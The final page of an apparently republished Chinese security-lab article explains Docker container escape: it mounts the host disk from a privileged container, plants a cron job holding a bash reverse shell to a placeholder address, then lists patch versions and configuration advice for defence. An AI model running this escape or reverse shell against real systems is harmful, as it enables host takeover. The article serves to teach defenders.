侵權投訴
訂閱
糾錯
加入自媒體

美創安全實驗室 | Docker逃逸原理

2020-07-31 17:50
美創科技
關注


同理,新建一個目錄/test2,將/dev/sda3掛載到新建的目錄下,并查看test2目錄下的內容,發現可以訪問宿主機上/目錄下的內容了

image.png


在計劃任務里寫入一個反彈shell:

echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root

image.png


在Docker上開啟netcat監聽7777端口,成功接收到宿主主機的Shell,實現Docker逃逸。

image.png


Docker逃逸防御

更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆蓋CVE-2019-5736。

runc版本 >1.0-rc6

k8s 集群版本>1.12

Linux內核版本>=2.6.22——CVE-2016-5195(臟牛)

Linux內核版本>=4.14——CVE-2017–1000405(大臟牛),未找到docker逃逸利用過程,但存在逃逸風險。

不建議以root權限運行Docker服務。

不建議以privileged(特權模式)啟動Docker。

不建議將宿主機目錄掛載至容器目錄。

不建議將容器以—cap-add=SYSADMIN啟動,SYSADMIN意為container進程允許執行mount、umount等一系列系統管理操作,存在容器逃逸風險。

美創科技聚焦數據安全,圍繞數據安全、災難備份、數據管理、智能運維等多方面挖掘和鑄造數據價值,憑借卓越的產品技術和服務贏得了眾多行業的認可和用戶口碑!

<上一頁  1  2  3  
聲明: 本文由入駐維科號的作者撰寫,觀點僅代表作者本人,不代表OFweek立場。如有侵權或其他問題,請聯系舉報。

發表評論

0條評論,0人參與

請輸入評論內容...

請輸入評論/評論長度6~500個字

您提交的評論過于頻繁,請輸入驗證碼繼續

暫無評論

暫無評論

    安防 獵頭職位 更多
    文章糾錯
    x
    *文字標題:
    *糾錯內容:
    聯系郵箱:
    *驗 證 碼:

    粵公網安備 44030502002758號